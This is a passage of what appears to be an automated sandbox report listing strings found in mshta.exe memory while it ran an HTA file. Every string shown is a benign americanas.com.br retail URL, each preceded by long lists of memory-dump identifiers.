Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2752639169.00000000092DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743361404.00000000092D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668295079.000000000C107000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770941763.00000000092DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667502431.000000000C106000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670707153.00000000092B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/afiliados?chave=dk_hm_ft_00_02_afiliados
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777141296.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654640832.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655302428.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/black-friday?chave=dk_hm_ft_00_09_blackfriday
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/celular-5g?chave=pfm_hm_tt_1_0_tecnologia5g
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2716850375.0000000009A52000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/lojas-oficiais?chave=dk_hm_branding_lojasoficiais
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727062236.000000000A851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/lojas-oficiais?chave=prf_hs_0_dt_1_00_lojasoficiais
Source: mshta.exe, 00000000.00000003.2676562635.000000000AA1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654506502.000000000AA0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654840614.000000000AA12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/lojasS
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669838233.000000000AC47000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764328514.000000000AC47000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678429529.000000000DF69000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667689266.000000000C0B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655218340.000000000AC2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725727617.000000000DF6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649211244.000000000AC29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678538607.000000000DF6B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655582214.000000000AC44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2678593074.000000000DF6C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natal
Source: mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667474903.00000000092FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776109405.000000000C0C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668705608.000000000C0C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natal?chave=dk_hm_ats_2_0_natal24
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776109405.000000000C0C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668705608.000000000C0C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766288586.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744420175.0000000003410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natal?chave=dk_hm_dt_2_9_natal24
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009332000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natal?chave=dk_hm_tp_1_0_natal24
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667474903.00000000092FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744538123.000000000C0A3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743317216.000000000C09F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726955229.000000000C09B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727148454.000000000C09C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665561816.000000000AA04000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669117708.000000000C09A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natal?chave=pfm_hm_tt_1_0_natal24
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744706415.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/natalcanc
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/especial/oferta-do-dia?chave=dk_hm_ats_2_9_oddJ
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/especial/oferta-do-dia?chave=prf_hm_0_tt_7_
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770501729.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mais-clima?chave=pfm_home_sustentabilidade_menu
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668493966.000000000C070000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764171931.000000000C07E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777141296.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654640832.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669539249.000000000C07E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655302428.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=brd_hm_bt_0_footer_amundo
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776701810.000000000C12C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747475403.000000000C12A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/americanas-mundo?chave=dk_hm_branding_amundo
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770501729.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 